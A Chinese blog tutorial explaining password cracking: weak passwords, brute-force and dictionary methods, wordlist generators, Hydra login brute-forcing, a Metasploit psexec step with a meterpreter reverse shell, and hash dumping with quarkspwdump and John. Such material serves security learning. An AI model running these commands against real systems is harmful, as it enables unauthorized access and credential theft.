口令破解(概述、暴力破解、字典破解、Hydra)

已于 2024-03-14 01:14:49 修改
阅读量2.5w 收藏 85
点赞数 9
分类专栏: 网络安全 文章标签: 网络安全
于 2020-12-14 11:47:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45677119/article/details/110941766
版权

文章目录

口令破解

概述

现在很多地方都以用户名(账号)和口令(密码)作为鉴权的方式,口令(
密码)就意味着访问权限。口令(密码)就相当于进入家门的钥匙,当他
人有一把可以进入你家的钥匙,想想你的安全、你的财务、你的隐私…
例如网站后台、数据库、服务器、个人电脑、QQ、邮箱等。

口令安全现状

  1. 弱口令
    类似于123456、654321k admin123 等这样常见的弱密码。
  2. 默认口令
    很多应用或者系统都存在默认口令;如phpstudy的mysql数据库默认账密[root/root],Tomcat管理控制台默认账密[tomcat/ tomcat]等。
  3. 明文传输
    如HTTP、FTP、TELNET等服务,在网络中传输的数据流都是明文的,包括口令认证信息等。这样的服务,有被嗅探的风险。

破解方式

暴力破解

暴力破解就是利用所有可能得字符组密码,去尝试破解。这是最原始,粗暴的破解方法,根据运算能力,如果能够承受的起时间成本的话,最终一定会爆破出密码。

字符集           密码位数             密码空间
[0-9]             8位            10^8=100000000
[0-9][a-z]        8位          36^8=2821109907456
[0-9][a-z]       1-8位                 ??

kali的字典生成工具:Crunch

是一种创建密码字典工具,按照指定的规则生成密码字典,可以灵活的制定自己的字典文件。使用Crunch工具生成的密码可以输出到屏幕,保存到文件、或另一个程序。

在这里插入图片描述

它有一个库文件:cat /usr/share/crunch/charset.lst

在这里插入图片描述

字典破解

字典破解就是通过比较合理的条件,筛选或者过滤掉一些全字符组合的
内容,大幅降低爆破的成本。我们把筛选出的密码组合成特定的字典。在用字典爆破密码也是可以的,但是这样做有可能会漏掉真正的密码。
密码字典大致分为以下几类:

  • 子域名字典
  • 默认账号密码字典
  • 文件路径字典
  • 日志文件
  • Web目录
  • 常用变量名字典
  • 常用文件名字典
  • 弱口令字典
    比如123456,admin等这样的默认口令或弱口令。
  • 社工字典
    人们在设置密码的时候,往往为了便于记忆,密码的内容和组合会与个人信息有关,比如常见的密码组合“名字+生日":[zhangsan1998]
    社工字典更具针对性,准确率也比较高,根据个人信息生成密码字典。

cupp工具

国外开发的,更偏向国外人的习惯。

在这里插入图片描述
在这里插入图片描述

生成一个以你输入的first name开头的txt字典:

在这里插入图片描述

其他字典生成器:

在这里插入图片描述

  • 字符集字典
    如果能确定密码的字符集合,也将大大降低爆破的成本。
Hydra
  1. “九头蛇”,是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码。
  2. windows版本下载:https://github.com/maaaaz/thc-hydra-windows
  3. 可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。
  4. 简单命令
# 指定用户进行密码破解
hydra.exe -L 用户名字典 -P 密码字典路径 目标地址 密码类型

-l LOGIN  指定破解的用户,对特定用户破解
-L FILE   指定用户名字典
-vV       显示爆破详细过程
-0        保存爆破结果
-f        找到正确的密码就停止爆破
-e nsr    null密码、same、反向
-t num    线程数为num

密码类型(telnet、ftp、ssh、smb...)
# 破解10.1.1.2主机上的远程登录密码,使用e盘下的user.txt用户名字典和e盘下的password.txt密码字典进行暴力破解
hydra.exe -L e:\user.txt -P e:\password.txt 10.1.1.2 telnet
  1. MSF----SMB,已知SMB帐密,远程连接windows系统并执行命令。
use exploit/windows/smb/psexec_psh
set payload windows/meterpreter/reverse tcp
set RHOSTS 目标IP地址
set SMBUSER 用户名
set SMBPASS 密码
set LHOST 监听IP地址
quarkspwdump
  1. 是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和 Bitlocker。
  2. 参数
-dhl   导出本地哈希值
-dhdc  导出内存中的域控哈希值
-dhd   导出域控哈希值,必须指定NTDS文件
-db    导出Bitlocker信息,必须指定NTDS文件
-nt    导出ntds文件
-hist  导出历史信息,可选项
-t     导出类型可选默认导出为John类型。
-o     导出文件到本地
  1. 在使用john进行破解
john hash文件 -- format=NT --wordlist=密码字典路径
john --show hash文件 --format=NT
Tigirs
关注
  • 9
    点赞
  • 85
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hydra 暴力破解弱密码
06-02
hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具
Cain&Abel;密码口令破解软件
05-01
著名的windows平台口令恢复工具。能通过网络嗅探很容易的回复多种口令,能使用字破解加密的口令,暴力口令破解,录音VOIP谈话内容,解码编码化的口令,获取无线网络密钥,恢复缓存的口令,分析路由协议等。
最新【信息安全课程设计】字典破解密码(1),2024年最新2024最新网络安全框架体系架构面试题
最新发布
2401_84300859的博客
05-14 678
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
密码--暴力破解
热门推荐
M_Young的博客
12-10 1万+
1.海德拉(Hydrahydra 是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解,功能强大,其密码能否被破解关键取决 于破解字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。 root@kali2019:~# hydra -L userlist.txt -P passwordlist.txt -t 20 192.168.106.134 ssh 我们先建立简单的字典 ...
【精选】弱口令介绍及破解方式
qq_53058639的博客
11-09 1043
仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。暴力破解,是一种针对于密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。例如一个已知是四位并且全部由数字组成的密码,其可能共有10000种组合,因此最多尝试10000次就能找到正确的密码。而当遇到人为设置密码(非随机密码,人为设置密码有规律可循)的场景,则可以使用密码字典(例如彩虹表)查找高频密码,破解时间大大缩短。
2017-2018-1 20155308《信息安全技术》实验二——Windows口令破解
weixin_30894389的博客
10-30 182
2017-2018-1 20155308《信息安全技术》实验二——Windows口令破解 实验原理 口令破解主要有两种方法:字典破解暴力破解字典破解是指通过破解者对管理员的了解,猜测其可能使用某些信息作为密码,例如其姓名、生日、电话号码等,同时结合对密码长度的猜测,利用工具来生成密码破解字典。如果相关信息设置准确,字典破解的成功率很高,并且其速度快,因此字典破解是密码破解的首选。 暴力...
手把手教你一步一步暴力破解密码,学不会来找我
2201_75765956的博客
11-17 1536
但是你不可能一个一个去手动构造数据包,所以在实施暴力破解之前,我们只需要先去获取构造HTTP包所需要的参数,然后扔给暴力破解软件构造工具数据包,然后实施攻击就可以了。暴力破解也可称为穷举法、枚举法,是一种针对于密码的破译方法,将密码进行逐个推算直到找出真正的密码为止。设置长而复杂的密码、在不同的地方使用不同的密码、避免使用个人信息作为密码、定期修改密码等是防御暴力破解的有效方法。暴力破解的原理就是使用攻击者自己的用户名和密码字典,一个一个去枚举,尝试是否能够登录。第三步:选择我们要破解的变量。
信息安全实验——口令破解技术
weixin_51970555的博客
09-30 2153
口令一般出现在网站管理、运营人员本身安全意识不足,并且为了方便、避免忘记密码,使用了非常容易记住的密码,或者是直接采用了系统的默认密码。弱口令的危害非常直接,攻击者可以利用此漏洞直接进入应用系统或者管理系统,从而进行系统、网页、数据的篡改与删除,非法获取系统、用户的数据,甚至可能导致服务器沦陷。
暴力破解之密码字典
zwa7879的博客
11-17 230
暴力破解多用于密码攻击领域,即使用各种不同的密码组合反复进行验证,直到找出正确的密码这种方式也称为“密码穷举”,用来尝试的所有密码集合称为"密码字典”从理论上来说,任何密码都可以使用这种方法来破解,只不过越复杂的密码需要的破解时间也越长通过文件管理系统找到生成的密码字典
密码破解字典攻击(C/C++代码实现)
chen1415886044的博客
08-13 2827
字典攻击是一种通过系统地将字典中的每个单词作为密码输入,从而侵入受密码保护的计算机、网络或其他IT资源的方法。字典攻击也可以用于查找解密加密消息或文档所需的密钥。 字典攻击之所以有效,是因为许多计算机用户和企业坚持使用普通单词作为密码。这些攻击通常针对使用多字密码的系统不成功,也经常针对由大小写字母和随机组合的数字组成的密码不成功。 在密码要求很高的系统中,暴力攻击方法有时是有效的,在这种方法中,字符和空格的每一个可能组合都要测试到一定的最大长度。然而,暴力攻击可能需要很长时间才能产生结果。
黑客入门破解网络密码常用九个方法
m0_59162248的博客
02-23 5869
个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果。比如,银行卡账户密码被盗,你就给别人打工了。所以,增强网民的网络安全意识是网络普及进程的一个重要环节。常言道:知己知彼方能百战不殆。因此,在个人采取安全措施来保护自己的网络密码之前,有必要先了解一下流行的网络密码的破解方法,方能对症下药,下面我就介绍一下几个主要的网络密码破解
password(字典
04-19
字典
口令破解具体实现过程
04-16
通过使用crunch生成字典密码,利用nmap扫描存活主机端口,最后利用Hydra破解用户口令
字典暴力破解工具汉化版
05-18
支持所有常见端口弱口令爆破,附带常见字典,可手动导入TXT文本字典,汉化版,支持中文。
口令破译及现状安全分析
06-05
口令破译及现状安全分析,本文主要叙述了口令的安全性,介绍了基于Windows NT的口令破译的方法和工具,口令的存放和破译口令的过程以及口令保护的相关内容。关键词:口令;安全性;破译。完整的PDF文件,绝对给力
密码破解工具,支持暴力破解,字典破解和极快速的"Booost-Up"破解法,
06-25
ZIP密码暴力破解工具,支持由WinZIP、PKZIP以及其它兼容ZIP格式的软件(比如WinRAR等)加密的ZIP压缩包,破解速度比较理想。 软件的功能特性:1.WinZIP、PKZIP全系列支持,兼容ZIP部分支持;2.自设字符、开始密码及密码长度设定等,中规中矩啦;3.断点续破
暴力破解-hydra-8.1(windows版)
07-17
这个不是一个图形界面的软件,需要在命令行界面执行。...在hydra文件夹下按住shift点击鼠标右键,选择终端打开(win10是在此处打开powershell) ctrl+r 输入cmd 然后进到这个目录也是一样的。 解压即可无需安装。 ...
Linux下暴力破解工具Hydra的使用(文档+PPT)
12-19
Hydra在所有支持GCC的平台能很好的编译这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破解,其密码能否被破解关键在于字典是否足够强大。其主要破解密码类型有HTTPS、Telnet、FTP、SSH、以POST或GET方式...
Ftp 暴力破解字典
04-06
代码 memset( szLine, 0, 160 ); dwFileLen = file.GetLength(); while( dwReadFileLen != dwFileLen ) { dwReadFileLen += file.Read( &nReadBuf, 1); if(nReadBuf !=13 $$ mReadBuf !... strncat(( TCHAR *)...
hydra 数据字典
09-25
Hydra 数据字典是一个记录和描述 Hydra 框架下数据实体、属性和关系的集合。Hydra 是一种开源的超媒体驱动的 Web API 框架,用于构建和管理 RESTful API,并与 Linked Data 兼容。 在 Hydra 数据字典中,我们可以找到关于 Hydra API 中的每个数据实体的详细信息。数据实体通常代表领域模型中的实际对象,例如用户、产品、订单等。每个数据实体都有一套属性,描述了该实体的特征和状态。 属性是数据实体中的各个方面的特征,例如用户实体的属性可以包括姓名、年龄、电子邮件等。每个属性都有一个数据类型和一组约束条件,用于规范属性的取值范围和格式。 在 Hydra 数据字典中,还可以定义数据实体之间的关系。关系描述了不同实体之间的链接和依赖关系。例如,一个订单实体可能与一个用户实体相关联,此时可以定义一个关系表示订单和用户之间的关联。 通过 Hydra 数据字典,开发者可以查看和了解 API 中所有可用的数据实体、属性和关系。这使得开发者能够根据需要构建和管理与 API 相关的数据。此外,Hydra 数据字典还可以用于生成 API 文档,帮助其他开发者快速了解和使用 API。 总而言之,Hydra 数据字典是一个记录 Hydra 框架下 API 数据实体、属性和关系的集合。它提供了一种规范和方便的方式,帮助开发者了解和使用 Hydra API,促进了 API 的开发和管理过程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值